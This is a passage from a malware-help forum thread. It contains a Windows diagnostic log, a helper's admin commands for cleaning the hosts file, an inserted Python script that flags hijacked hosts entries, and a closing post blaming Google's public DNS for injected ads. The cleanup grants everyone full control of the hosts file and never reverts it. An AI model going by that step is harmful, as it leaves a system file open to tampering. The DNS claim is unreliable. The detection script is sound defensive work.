Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.0.1:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
===========================================================================
Interface List
20...00 ff 45 b1 eb 02 ......TAP-Win32 Adapter V9 #2
19...00 ff 41 2a e7 35 ......TAP-Win32 Adapter V9
11...00 22 4d 4f dc f7 ......Intel® 82579V Gigabit Network Connection
1...........................Software Loopback Interface 1
12...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
13...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
15...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
16...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #3
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.1.1 192.168.1.8 20
127.0.0.0 255.0.0.0 On-link 127.0.0.1 306
127.0.0.1 255.255.255.255 On-link 127.0.0.1 306
127.255.255.255 255.255.255.255 On-link 127.0.0.1 306
192.168.1.0 255.255.255.0 On-link 192.168.1.8 276
192.168.1.8 255.255.255.255 On-link 192.168.1.8 276
192.168.1.255 255.255.255.255 On-link 192.168.1.8 276
224.0.0.0 240.0.0.0 On-link 127.0.0.1 306
224.0.0.0 240.0.0.0 On-link 192.168.1.8 276
255.255.255.255 255.255.255.255 On-link 127.0.0.1 306
255.255.255.255 255.255.255.255 On-link 192.168.1.8 276
===========================================================================
Persistent Routes:
None

IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
13 58 ::/0 On-link
1 306 ::1/128 On-link
13 58 2001::/32 On-link
13 306 2001:0:5ef5:79fb:300b:28b9:93e3:5a5d/128
On-link
11 276 fe80::/64 On-link
13 306 fe80::/64 On-link
13 306 fe80::300b:28b9:93e3:5a5d/128
On-link
11 276 fe80::3040:4969:6b63:1f2a/128
On-link
1 306 ff00::/8 On-link
13 306 ff00::/8 On-link
11 276 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
========================= Winsock entries =====================================

Catalog5 01 C:\Windows\SysWOW64\NLAapi.dll [52224] (Microsoft Corporation)
Catalog5 02 C:\Windows\SysWOW64\napinsp.dll [52224] (Microsoft Corporation)
Catalog5 03 C:\Windows\SysWOW64\pnrpnsp.dll [65024] (Microsoft Corporation)
Catalog5 04 C:\Windows\SysWOW64\pnrpnsp.dll [65024] (Microsoft Corporation)
Catalog5 05 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog5 06 C:\Windows\SysWOW64\winrnr.dll [20992] (Microsoft Corporation)
Catalog5 07 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Catalog9 01 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 02 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 03 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 04 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 05 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 06 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 07 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 08 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 09 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
Catalog9 10 C:\Windows\SysWOW64\mswsock.dll [232448] (Microsoft Corporation)
x64-Catalog5 01 C:\Windows\System32\NLAapi.dll [70656] (Microsoft Corporation)
x64-Catalog5 02 C:\Windows\System32\napinsp.dll [68096] (Microsoft Corporation)
x64-Catalog5 03 C:\Windows\System32\pnrpnsp.dll [86016] (Microsoft Corporation)
x64-Catalog5 04 C:\Windows\System32\pnrpnsp.dll [86016] (Microsoft Corporation)
x64-Catalog5 05 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog5 06 C:\Windows\System32\winrnr.dll [28672] (Microsoft Corporation)
x64-Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [132968] (Apple Inc.)
x64-Catalog9 01 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 02 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 03 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 04 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 05 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 06 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 07 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 08 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 09 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)
x64-Catalog9 10 C:\Windows\System32\mswsock.dll [326144] (Microsoft Corporation)

========================= Event log errors: ===============================

Application errors:
==================
Error: (04/16/2012 10:18:37 PM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1".Error in manifest or policy file "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" on line C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (04/16/2012 10:18:35 PM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1".Error in manifest or policy file "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" on line C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (04/16/2012 10:18:24 PM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1".Error in manifest or policy file "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" on line C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (04/16/2012 03:49:33 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/09/2012 01:10:22 PM) (Source: Application Error) (User: )
Description: Faulting application name: WINWORD.EXE, version: 11.0.5604.0, time stamp: 0x3f314a2f
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc000041d
Fault offset: 0x74e14f0d
Faulting process id: 0x1e5c
Faulting application start time: 0xWINWORD.EXE0
Faulting application path: WINWORD.EXE1
Faulting module path: WINWORD.EXE2
Report Id: WINWORD.EXE3

Error: (04/06/2012 02:59:29 PM) (Source: Application Error) (User: )
Description: Faulting application name: WINWORD.EXE, version: 11.0.5604.0, time stamp: 0x3f314a2f
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc000041d
Fault offset: 0x74e14f0d
Faulting process id: 0x1ef4
Faulting application start time: 0xWINWORD.EXE0
Faulting application path: WINWORD.EXE1
Faulting module path: WINWORD.EXE2
Report Id: WINWORD.EXE3

Error: (04/02/2012 09:10:03 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/02/2012 01:03:22 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/01/2012 05:23:46 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (03/30/2012 08:25:22 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


System errors:
=============
Error: (04/16/2012 03:49:31 PM) (Source: Service Control Manager) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
luafv

Error: (04/16/2012 03:49:17 PM) (Source: Service Control Manager) (User: )
Description: The lxefCATSCustConnectService service failed to start due to the following error:
%%1053

Error: (04/16/2012 03:49:17 PM) (Source: Service Control Manager) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the lxefCATSCustConnectService service to connect.

Error: (04/02/2012 09:09:59 PM) (Source: Service Control Manager) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
luafv

Error: (04/02/2012 09:09:50 PM) (Source: Service Control Manager) (User: )
Description: The lxefCATSCustConnectService service failed to start due to the following error:
%%1053

Error: (04/02/2012 09:09:50 PM) (Source: Service Control Manager) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the lxefCATSCustConnectService service to connect.

Error: (04/02/2012 01:03:08 PM) (Source: Service Control Manager) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
luafv

Error: (04/02/2012 01:02:41 PM) (Source: Service Control Manager) (User: )
Description: The lxefCATSCustConnectService service failed to start due to the following error:
%%1053

Error: (04/02/2012 01:02:41 PM) (Source: Service Control Manager) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the lxefCATSCustConnectService service to connect.

Error: (04/01/2012 05:23:44 PM) (Source: Service Control Manager) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
luafv


Microsoft Office Sessions:
=========================
Error: (04/16/2012 10:18:37 PM) (Source: SideBySide)(User: )
Description: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifestC:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifestC:\Users\Owner\Desktop\esetsmartinstaller_enu.exe

Error: (04/16/2012 10:18:35 PM) (Source: SideBySide)(User: )
Description: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifestC:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifestC:\Users\Owner\Desktop\esetsmartinstaller_enu.exe

Error: (04/16/2012 10:18:24 PM) (Source: SideBySide)(User: )
Description: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifestC:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifestC:\Users\Owner\Desktop\esetsmartinstaller_enu.exe

Error: (04/16/2012 03:49:33 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/09/2012 01:10:22 PM) (Source: Application Error)(User: )
Description: WINWORD.EXE11.0.5604.03f314a2funknown0.0.0.000000000c000041d74e14f0d1e5c01cd15648fefddfcC:\PROGRA~2\MICROS~1\OFFICE11\WINWORD.EXEunknowne3831dd8-8266-11e1-803a-00224d4fdcf7

Error: (04/06/2012 02:59:29 PM) (Source: Application Error)(User: )
Description: WINWORD.EXE11.0.5604.03f314a2funknown0.0.0.000000000c000041d74e14f0d1ef401cd141eb0b4c62cC:\PROGRA~2\MICROS~1\OFFICE11\WINWORD.EXEunknowna2a46109-801a-11e1-803a-00224d4fdcf7

Error: (04/02/2012 09:10:03 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/02/2012 01:03:22 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/01/2012 05:23:46 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (03/30/2012 08:25:22 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


=========================== Installed Programs ============================

7-Zip 9.20
Adobe Acrobat X Pro - English, Français, Deutsch (Version: 10.1.3)
Adobe AIR (Version: 2.7.0.19530)
Adobe Community Help (Version: 3.4.980)
Adobe Creative Suite 5.5 Master Collection (Version: 5.5)
Adobe ExtendScript Toolkit 2 (Version: 2.0.2)
Adobe Flash Player 11 ActiveX 64-bit (Version: 11.2.202.233)
Adobe Flash Player 11 Plugin 64-bit (Version: 11.2.202.233)
Adobe Reader X (10.1.3) (Version: 10.1.3)
Adobe Setup (Version: 1.0)
Adobe Story (Version: 1.0.571)
Amazon MP3 Downloader 1.0.12 (Version: 1.0.12)
Apple Application Support (Version: 2.1.7)
Apple Mobile Device Support (Version: 5.1.1.4)
Apple Software Update (Version: 2.1.3.127)
Applian FLV and Media Player 3.1.1.12 (Version: 3.1.1.12)
AVS Screen Capture version 2.0.1
AVS Update Manager 1.0
AVS Video Converter 8
AVS Video Editor 6
AVS Video Recorder 2.4
AVS4YOU Software Navigator 1.4
BitTorrent (Version: 7.5.0)
BlitzIn 3.0
Bonjour (Version: 3.0.0.10)
CCleaner (Version: 3.17)
CDBurnerXP (Version: 4.3.8.2568)
Compatibility Pack for the 2007 Office system (Version: 12.0.6514.5001)
Dropbox (Version: 1.2.52)
ESET Online Scanner v3
FastStone Photo Resizer 3.1 (Version: 3.1)
Finale 2008 (Version: 13.1.9)
Garritan Instruments for Finale (Version: 1.0.13)
GoldWave v5.67
Google Chrome (Version: 18.0.1025.162)
Google Update Helper (Version: 1.3.21.111)
GPXtoPOI
Hydra
iCloud (Version: 1.1.0.40)
Intel® Management Engine Components (Version: 7.0.0.1144)
Intel® Network Connections 16.1.53.0 (Version: 16.1.53.0)
Intel® Rapid Storage Technology (Version: 10.1.0.1008)
iTunes (Version: 10.6.1.7)
iZotope Spectron for DirectX (Version: 1.0)
iZotope Trash for DirectX (Version: 1.0)
Java Auto Updater (Version: 2.0.6.1)
Java™ 6 Update 22 (Version: 6.0.220)
Java™ 6 Update 29 (Version: 6.0.290)
Karen's Directory Printer (Version: 5.3.0.2)
Lexmark S800 Series
LogMeIn (Version: 4.1.1868)
Machinarium (Version: 23.10.09)
Malwarebytes Anti-Malware version 1.61.0.1400 (Version: 1.61.0.1400)
marvell 61xx (Version: 1.2.0.7700)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319)
Microsoft Office Professional Edition 2003 (Version: 11.0.5614.0)
Microsoft Visual C++ 2005 Redistributable (Version: 8.0.56336)
Microsoft Visual C++ 2005 Redistributable (Version: 8.0.61001)
Microsoft Visual C++ 2005 Redistributable (x64) (Version: 8.0.56336)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (Version: 9.0.30729)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (Version: 9.0.30729.4148)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (Version: 9.0.30729.4148)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (Version: 9.0.30729.6161)
Microsoft_VC80_ATL_x86 (Version: 8.0.50727.4053)
Microsoft_VC80_ATL_x86_x64 (Version: 8.0.50727.4053)
Microsoft_VC80_CRT_x86 (Version: 8.0.50727.4053)
Microsoft_VC80_CRT_x86_x64 (Version: 8.0.50727.4053)
Microsoft_VC80_MFC_x86 (Version: 8.0.50727.4053)
Microsoft_VC80_MFC_x86_x64 (Version: 8.0.50727.4053)
Microsoft_VC80_MFCLOC_x86 (Version: 8.0.50727.4053)
Microsoft_VC80_MFCLOC_x86_x64 (Version: 80.50727.4053)
Microsoft_VC90_ATL_x86 (Version: 1.00.0000)
Microsoft_VC90_ATL_x86_x64 (Version: 1.00.0000)
Microsoft_VC90_CRT_x86 (Version: 1.00.0000)
Microsoft_VC90_CRT_x86_x64 (Version: 1.00.0000)
Microsoft_VC90_MFC_x86 (Version: 1.00.0000)
Microsoft_VC90_MFC_x86_x64 (Version: 1.00.0000)
Microsoft_VC90_MFCLOC_x86 (Version: 1.00.0000)
Microsoft_VC90_MFCLOC_x86_x64 (Version: 1.00.0000)
MIDI-OX (Version: 7.02.372)
MobileMe Control Panel (Version: 3.1.8.0)
Motorola Bluetooth (Version: 3.0.02.285)
Moyea FLV Editor Lite version: 1.0.1.0
Mozilla Firefox 11.0 (x86 en-US) (Version: 11.0)
MozyHome (Version: 2.12.1.160)
Native Instruments Kontakt 3 (Version: 3.5.0.025)
Native Instruments Kontakt Factory Selection (Version: 1.0.0.002)
Native Instruments Service Center (Version: 2.2.0.367)
NexusFont 2.5 (ver 2.5.6.1478)
NVIDIA 3D Vision Controller Driver (Version: 275.33)
NVIDIA 3D Vision Controller Driver 275.33 (Version: 275.33)
NVIDIA 3D Vision Driver 275.33 (Version: 275.33)
NVIDIA Control Panel 275.33 (Version: 275.33)
NVIDIA Graphics Driver 275.33 (Version: 275.33)
NVIDIA HD Audio Driver 1.2.23.3 (Version: 1.2.23.3)
NVIDIA Install Application (Version: 2.275.80.0)
NVIDIA PhysX (Version: 9.10.0514)
NVIDIA PhysX System Software 9.10.0514 (Version: 9.10.0514)
NVIDIA Stereoscopic 3D Driver (Version: 7.17.12.7533)
NVIDIA Update 1.3.5 (Version: 1.3.5)
NVIDIA Update Components (Version: 1.3.5)
OpenVPN 2.1_rc20 (Version: 2.1_rc20)
Orion 7.6
Paragon Backup & Recovery™ 10 Suite (Version: 90.00.0003)
PDF Settings CS5 (Version: 10.0)
Plucked String
Poly850 VSTi/DXi v1.01 (Version: 1.0)
QuickTime (Version: 7.71.80.42)
Ralink RT2870 Wireless LAN Card (Version: 3.1.4.0)
Realtek High Definition Audio Driver (Version: 6.0.1.6392)
Renesas Electronics USB 3.0 Host Controller Driver (Version: 2.1.16.0)
RME Hammerfall DSP (WDM) (Version: 3.2.6.0)
Safari (Version: 5.34.55.3)
Scorpion
SiSoftware Sandra Lite 2011.SP3 (Version: 17.64.2011.7)
SpyHunter (Version: 4.8.13.3861)
SQLyog 5.19 (Version: 5.19)
TextPad 5 (Version: 5.4.2)
TortoiseSVN 1.7.6.22632 (64 bit) (Version: 1.7.22632)
Toxic 2.5
VirtualCloneDrive
WebEx
Windows Media Player Firefox Plugin (Version: 1.0.0.8)
WinSCP 4.3.5 (Version: 4.3.5)
X-Poly

========================= Memory info: ===================================

Percentage of memory in use: 54%
Total physical RAM: 8174.22 MB
Available physical RAM: 3716.45 MB
Total Pagefile: 16346.63 MB
Available Pagefile: 11696.43 MB
Total Virtual: 4095.88 MB
Available Virtual: 3968.04 MB

========================= Partitions: =====================================

1 Drive c: (OS) (Fixed) (Total:452.64 GB) (Free:389.76 GB) NTFS
3 Drive e: (Storage) (Fixed) (Total:931.51 GB) (Free:931.38 GB) NTFS
4 Drive f: (SimpleDrive) (Fixed) (Total:465.76 GB) (Free:364.15 GB) NTFS
5 Drive g: (WD SmartWare) (CDROM) (Total:0.6 GB) (Free:0 GB) UDF
6 Drive h: (My Passport) (Fixed) (Total:465.11 GB) (Free:399.31 GB) NTFS
7 Drive i: (ScribbyWibby) (Fixed) (Total:931.51 GB) (Free:53.79 GB) NTFS

========================= Users: ========================================

User accounts for \\OWNER-PC110658

Administrator Guest LogMeInRemoteUser
Owner UpdatusUser


**** End of log ****

#10 narenxp

Posted 16 April 2012 - 10:47 PM

Click on the Start menu and type

cmd

Right-click on it and select Run as administrator

Now type the following commands and press ENTER after each one


cd c:\windows\system32\drivers\etc
takeown /a /f hosts
cacls hosts /p everyone:f
attrib -s -h -r hosts
notepad hosts


Notepad should pop up

Now scroll to the bottom and delete the fake entries

You can check the default hosts entries for Windows 7 here

http://support.microsoft.com/kb/972034

Save the file in Notepad and run this command

attrib +s +h +r hosts

Now launch MiniToolBox, checkmark Hosts content alone, and post the new log

Good luck

Edited by narenxp, 19 April 2012 - 08:44 AM.
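
A read-only check for the "delete the fake entries" step above, added here as an example and not part of narenxp's post or of MiniToolBox: it lists every active hosts entry other than the stock localhost line and separates loopback sinkholes from redirects to another machine. The sample file contents, the 203.0.113.45 address and the function names are constructed for illustration.

```python
import ipaddress

# Constructed sample, not taken from the thread. 203.0.113.45 is a
# documentation-range address standing in for an attacker-chosen server.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#       127.0.0.1       localhost
127.0.0.1       localhost
0.0.0.0         ads.example.net      # blocked on purpose
127.0.0.1       tracker.example.org
203.0.113.45    www.google-analytics.com google-analytics.com
203.0.113.45\tssl.example.com
not-an-ip       broken.example.com
"""

DEFAULT_NAMES = {"localhost"}  # the only name a stock hosts file should map


def audit_hosts(text):
    """Return (line_no, address, hostname, verdict) for each non-default entry."""
    findings = []
    for line_no, raw in enumerate(text.lstrip("\ufeff").splitlines(), start=1):
        entry = raw.split("#", 1)[0].strip()  # comments never resolve anything
        if not entry:
            continue
        address, *names = entry.split()
        try:
            ip = ipaddress.ip_address(address)
        except ValueError:
            findings.append((line_no, address, " ".join(names), "malformed"))
            continue
        for name in (n.lower().rstrip(".") for n in names):
            if name in DEFAULT_NAMES and ip.is_loopback:
                continue  # 127.0.0.1 / ::1 localhost is expected
            # Loopback or 0.0.0.0 only blocks a name; anything else sends the
            # browser to another machine under the original hostname.
            local = ip.is_loopback or ip.is_unspecified
            findings.append((line_no, address, name, "sinkhole" if local else "redirect"))
    return findings


def redirects(text):
    """Hostnames forced to a non-local address: review these first."""
    return sorted({name for _, _, name, verdict in audit_hosts(text)
                   if verdict == "redirect"})


if __name__ == "__main__":
    for line_no, address, name, verdict in audit_hosts(SAMPLE_HOSTS):
        print(f"line {line_no}: {name} -> {address} [{verdict}]")
```

On a live system, feed it the text of the hosts file in c:\windows\system32\drivers\etc; an empty result means only the default localhost mapping is active.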


#11 mattsbach

Posted 16 April 2012 - 10:53 PM

ok here it is:

MiniToolBox by Farbar Version: 18-01-2012
Ran by Owner (administrator) on 16-04-2012 at 23:53:25
Microsoft Windows 7 Professional Service Pack 1 (X64)
Boot Mode: Normal
***************************************************************************
========================= Hosts content: =================================



127.0.0.1 localhost


**** End of log ****

#12 narenxp

Posted 16 April 2012 - 11:11 PM

That looks good

Download

TFC


Launch it; it will close all running programs

Click on START; it should ask for a reboot

Turn off your System Restore, restart the PC, and create a new restore point

http://windows.microsoft.com/en-US/windows7/Turn-System-Restore-on-or-off

Update your Java from here

http://java.com/en/download/inc/windows_upgrade_xpi.jsp


Update your antivirus frequently, and do not click on suspicious links

Safe surfing :)

#13 mattsbach

Posted 16 April 2012 - 11:23 PM

wonderful - thank you so much!

#14 narenxp

Posted 17 April 2012 - 12:20 AM

You're most welcome :thumbsup:

#15 Buddhaa

Posted 28 April 2012 - 01:58 PM

This could be it.

As we were developing a new website for our client, we saw one of our client's AdWords ads popping up on their own site. So now we know where they are coming from and who benefits from them.

After running a DNS tool listed above, my firewall popped up a message about the DNS server I was using on this computer.
8.8.8.8 and 8.8.4.4 - that's the Google DNS server setting that I manually changed to a few months back for what I thought would be a speed improvement.

Putting 2 and 2 together, I rolled back to my ISP's DNS server and haven't gotten an ad since then.

This thing has been driving me nuts for months; I registered to share this since no amount of tools will find this.



